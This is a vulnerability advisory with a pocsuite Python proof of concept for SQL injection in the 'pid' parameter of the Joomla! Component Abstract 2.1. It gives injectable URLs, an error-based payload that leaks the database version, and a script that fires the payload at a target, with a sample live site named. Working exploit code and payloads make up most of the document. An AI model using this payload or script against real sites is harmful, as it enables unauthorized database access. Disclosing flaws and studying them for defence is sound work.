Joomla! Component Abstract v2.1 - SQL Injection

2017-03-04T00:00:00
ID SSV:92733
Type seebug
Reporter Z3r0yu
Modified 2017-03-04T00:00:00

Description

Joomla! Component Abstract v2.1 - SQL Injection

In Joomla! Component Abstract v2.1, a request parameter (`pid`, see the injection points below) is not strictly filtered before being used in a SQL statement, leading to a SQL injection vulnerability.

Injection point:

# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=[SQL]
# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]

Error-based injection payload:

1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1

Test screenshot:

PoC validation:

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    """pocsuite PoC for the SQL injection in Joomla! Component Abstract 2.1.

    Both ``_attack`` and ``_verify`` run the same check: a single GET request
    to ``index.php?option=com_abstract&view=conferences&layout=detail&pid=...``
    carrying an error-based payload, after which the response body is
    searched for a fixed marker string. The only output is the pocsuite
    ``Output`` object built by ``parse_output``.
    """
    vulID = '0'  # ssvid  -- NOTE(review): the advisory header lists SSV:92733; left as '0' here
    version = '1.0'
    author = ['Z3r0yu']
    vulDate = '2017-03-02'
    createDate = '2017-03-03'
    updateDate = '2017-03-03'
    references = ['https://www.exploit-db.com/exploits/41493/']
    name = 'Joomla! Component Abstract 2.1 - SQL Injection'
    appPowerLink = 'https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/'
    appName = 'Component_Abstract_2.1_sql_inj_PoC'
    appVersion = '2.1'
    vulType = 'SQL Injection'
    # desc (Chinese, kept verbatim since it is runtime data): "the pid
    # parameter is insufficiently filtered and is passed into a SQL
    # statement, causing SQL injection".
    desc = '''
        pid参数过滤不严带入SQL语句导致SQL注入
    '''
    # Sample target URL recorded by the author.
    samples = ['http://demo.joomla6teen.com/abstractmanager']
    # NOTE(review): a list holding one empty string; probably meant to be an
    # empty list -- confirm what pocsuite expects here.
    install_requires = ['']

    def _attack(self):
        """Attack mode does nothing beyond the verification check.

        Returns whatever ``_verify`` returns (a pocsuite ``Output``).
        """
        
        return self._verify() 

    def _verify(self):
        """Check whether ``self.url`` is affected.

        Steps:
          1. Append a fixed query string (error-based payload in ``pid``) to
             ``self.url`` by plain concatenation -- no handling of a trailing
             slash or of an existing query string on the configured URL.
          2. Issue one GET request through ``req.get``.
          3. Search the response content for the marker
             ``e165421110ba03099a1c0393373c5b43`` (expected to be the hex
             MD5 of '233', produced by the ``md5(233)`` call inside the
             CONCAT_WS expression when the DBMS error text is echoed back).

        Returns the ``Output`` built by ``parse_output``: success with the
        URL and payload recorded under ``VerifyInfo`` when the marker is
        found, otherwise fail.

        Detection note: the marker literal and the
        ``GROUP BY CONCAT_WS(...) HAVING MIN(0)`` shape in the request line
        are the signatures a WAF rule or web-log review would key on.
        """
        result = {}
        vulurl = self.url
        payload = "/index.php?option=com_abstract&view=conferences&layout=detail&pid=1+OR+1+GROUP+BY+CONCAT_WS(md5(233),0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1"
        # Plain string concatenation: assumes self.url has no trailing slash
        # and no query string of its own -- TODO confirm against callers.
        exp = vulurl+payload
        resp = req.get(exp)

        # NOTE(review): a str is searched inside resp.content; this appears
        # to target the Python 2 pocsuite API, where content is a str. Under
        # Python 3 requests returns bytes here and the test would raise
        # TypeError rather than report "not vulnerable".
        if 'e165421110ba03099a1c0393373c5b43' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload

        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in a pocsuite ``Output``.

        A non-empty ``result`` dict is reported via ``output.success``; an
        empty one is reported via ``output.fail`` with the fixed message
        'Internet nothing returned' (the message wording is kept as-is).
        """
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


# Hand the PoC class to pocsuite's registry (``register`` is imported from
# pocsuite.api.poc) so the framework can discover and run it.
register(TestPOC)